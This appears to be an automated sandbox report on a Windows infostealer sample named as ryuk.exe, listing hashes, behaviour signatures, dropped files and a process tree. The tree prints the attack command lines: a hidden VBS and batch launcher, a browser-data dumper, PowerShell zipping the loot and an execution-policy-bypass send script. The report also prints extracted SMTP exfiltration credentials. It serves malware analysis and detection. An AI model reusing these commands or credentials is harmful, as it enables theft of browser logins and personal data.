Analysis

  • max time kernel
    96s
  • max time network
    103s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08/10/2024, 03:56

General

  • Target

    2024-10-08_fc98f5d0bc1552483a44c85d53384a6e_ryuk.exe

  • Size

    14.0MB

  • MD5

    fc98f5d0bc1552483a44c85d53384a6e

  • SHA1

    d696097fec437d4f31739d1460b180e67795b9d6

  • SHA256

    33a32609cb5acf54abeef9eed08d24a03dfd138ddd4b6132c8add72d8232b43a

  • SHA512

    5b3f9769de97b61568611ed852efcdcb52d9d2371026dc434aeab2f42197cc6a876a24c1132ec0861bd6895c7c9ca164370da9ae63009bd4432ef8ed9dddefa4

  • SSDEEP

    393216:IxhOGfw/zTNVC2bH2McKpqeTP91UIU537BEBE/P:aIoszT7C2KMzg537iBEH

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.mail.ru
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    acC1BbG3DWMqx8btFk0h

Signatures

  • An open source browser data exporter written in golang. 2 IoCs
  • HackBrowserData

    An open source golang web browser extractor.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-08_fc98f5d0bc1552483a44c85d53384a6e_ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-08_fc98f5d0bc1552483a44c85d53384a6e_ryuk.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hideCMD.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ha.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1596
        • C:\Windows\system32\cmd.exe
          cmd /c "start "" .\toboot\hack-browser-data.exe -f json --dir res --zip"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1348
          • C:\Users\Admin\AppData\Local\Temp\toboot\hack-browser-data.exe
            .\toboot\hack-browser-data.exe -f json --dir res --zip
            5⤵
            • Executes dropped EXE
            PID:1264
        • C:\Windows\system32\timeout.exe
          timeout /t 4
          4⤵
          • Delays execution with timeout.exe
          PID:3000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Compress-Archive -Path ".\res" -DestinationPath .\res.zip -CompressionLevel Fastest -Force
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -ep bypass -file "HBDSend.ps1"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1260
        • C:\Windows\system32\timeout.exe
          timeout /t 4
          4⤵
          • Delays execution with timeout.exe
          PID:2180

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    fe3aab3ae544a134b68e881b82b70169

    SHA1

    926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

    SHA256

    bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

    SHA512

    3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    c86ee90124c6374bc4c440a308eceb38

    SHA1

    b2075096ffa0abb9ba5abb0348e921e03fdf97b1

    SHA256

    99412b05f5ff937533a9c7dfc5ae65a4626c8f7f8b985c0b3a1e0ab5933863c8

    SHA512

    3dfadcd144a269cdf379aeb7f911642823e0426cda40cd231d90360f2aef7f6e49e68e0eaf742327ea3422a373128fb9652f8a361caa6ba99b8623eef1c6b8de

  • C:\Users\Admin\AppData\Local\Temp\.git\logs\refs\remotes\origin\HEAD

    Filesize

    206B

    MD5

    161010715d0c362173bf20c28c2fd9b7

    SHA1

    f80849d90d3a9843a658e5560f000f97fc4d8d01

    SHA256

    de309dabda86493c2e3260c1e17dd794211789121ffbd93a291909d48a5697e7

    SHA512

    c7599a1d21226e3fb73e669a9451b14dfc6d0d9ce6866bc382e32c645f79671f6457b15cf5e377006bc14f3cd8dd7754a5ff1e4496c1bb4129d7d271ff2293c4

  • C:\Users\Admin\AppData\Local\Temp\HBDSend.ps1

    Filesize

    390B

    MD5

    4802a57c6fccba23e67bc66c31356d4f

    SHA1

    fc030aa0f325b17643f58c2659c0742890d9f3d7

    SHA256

    5578ae9942d3aeba7898924a489752dd6c209d4b22cbbdb2eb5f946c61d0df35

    SHA512

    9c2843455b90f14393ff1f6e7b0736607ba16a0e89eef4a9f0d6b7affd3430b2b6dcf87d588758f99d3ae29fcb365e584e40d760024dd1ea2108b3d9190d0b0a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ssqlpobn.fq3.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\chromiumKey

    Filesize

    8KB

    MD5

    958a1ff72044f30f68af82e585733974

    SHA1

    9ac41e433578b0e8aaa2f4b8ca7cb228d9d412f3

    SHA256

    d53a7c0b594df00f6c490776af5e2f4697c585a470eb9d2c5d77292722756eaf

    SHA512

    de9d693a3c8ae4c6814427120bb163737e7714bec98d5c2a825e163addfd497818a9ba9c55b5ca2bddf5b4b2f1ba9588586b2a96405ee443b8babf2433d98256

  • C:\Users\Admin\AppData\Local\Temp\ha.bat

    Filesize

    338B

    MD5

    fddf7e3115d866f57c8ee7c39faba7c7

    SHA1

    380fd6c70888e59b3e6422b482bd993a1c6f4092

    SHA256

    58eba8234f52ee4f5cb65bcc38f612fcd0025fbfaaa092f994aa0af02c2623cd

    SHA512

    3efc29aab85d86e83f533baadd275b4692eef50cf1cd600fc6bd27f110bfc0494353ed99679e9e93e3cdc119ea05161cb35906855ad8dedcf6f2324f87041d55

  • C:\Users\Admin\AppData\Local\Temp\hideCMD.vbs

    Filesize

    51B

    MD5

    8cb717954c207bc5d1866f0b91f3705b

    SHA1

    bb2eb348bbaae1c03f0e8a69fe632acf3654906d

    SHA256

    5098540013c04d7a204e5ccd000d0342e2724b2a5747c6cde3423c33670e7125

    SHA512

    28671621ebc6b0e2ef08d910770463935f484b3a2bbf2f2d902436856ca63dfefb1d4c5c57bb0eb84d973295bf7dccf4767a72ed26b62f9b7476c5ac51b858bd

  • C:\Users\Admin\AppData\Local\Temp\localStorage\CURRENT

    Filesize

    16B

    MD5

    46295cac801e5d4857d09837238a6394

    SHA1

    44e0fa1b517dbf802b18faf0785eeea6ac51594b

    SHA256

    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

    SHA512

    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

  • C:\Users\Admin\AppData\Local\Temp\res.zip

    Filesize

    1KB

    MD5

    da4955f00150bd6659d9fede22cdb031

    SHA1

    b62d735d547383fc8cd99a39ec8b09373dd0aee7

    SHA256

    7b2ca17aef33a27c0a304a1db291d62510e6bac8470354d8a20508ad5827dccd

    SHA512

    aa657169a85d1ac7c5691a7c3eed6cad19bd6c6671f246045bcc3c94df7338a5bd4a0a382588d98539b6c106ec38997a24ea14f25c67b2d564c1197e54e86e09

  • C:\Users\Admin\AppData\Local\Temp\res\firefox_42vejdix_default_release_bookmark.json

    Filesize

    1023B

    MD5

    be3ef38a5549839f142b69e300d32859

    SHA1

    0d5f559740bbdafbb8ba682ce3c36ad5ad2d9729

    SHA256

    2cf82dab7376ec4da21b96f13cc93f485ca648d39be003774f7a77ca130e0a58

    SHA512

    ea9734b74c666ef127d28358c72b6fb79fccc5bb59d81a52b15865fd2760101e91b958944d95b02818859b4d4b608748e4a68160dfe2a729b038803606b4242a

  • C:\Users\Admin\AppData\Local\Temp\res\firefox_42vejdix_default_release_extension.json

    Filesize

    2KB

    MD5

    c69904bff2d0e3fdae0d5fcda30ef19d

    SHA1

    fead75d0019382bfe4250c1c05c69f8845cb1f77

    SHA256

    0151f2d1ed4d991e25f8e657eced0406b0fe4011a34013dbe5eff7809e80061d

    SHA512

    406733f0f5f0b8f9d3e898b28b1f89be35e48a86391ed317b0f9e60aebdd1f9581acf3863c8490c3dcb72ed989aed5b33458e5553944968ce318e5ac850c3c77

  • C:\Users\Admin\AppData\Local\Temp\toboot\hack-browser-data.exe

    Filesize

    20.9MB

    MD5

    6c66514d0e3b4cf5a2e4c2844efcb1f3

    SHA1

    682d46485ce44e719309f80483221d82011c3779

    SHA256

    7374c9b387000b813be75e10c2b988bf8d892985de63eb7446e11ceb225312e8

    SHA512

    4ca2657b47f145db2b162428ed057b52260a0db6758bf21803d75c6451914918f6392a4f8eb4216929e9feac1da70c161bd5ff61878d328863c9267c798c81a5

  • memory/1264-262-0x00007FF70BCD0000-0x00007FF70D15E000-memory.dmp

    Filesize

    20.6MB

  • memory/4256-268-0x00000223589B0000-0x00000223589D2000-memory.dmp

    Filesize

    136KB

  • memory/4256-273-0x0000022358A50000-0x0000022358A62000-memory.dmp

    Filesize

    72KB

  • memory/4256-274-0x00000223589F0000-0x00000223589FA000-memory.dmp

    Filesize

    40KB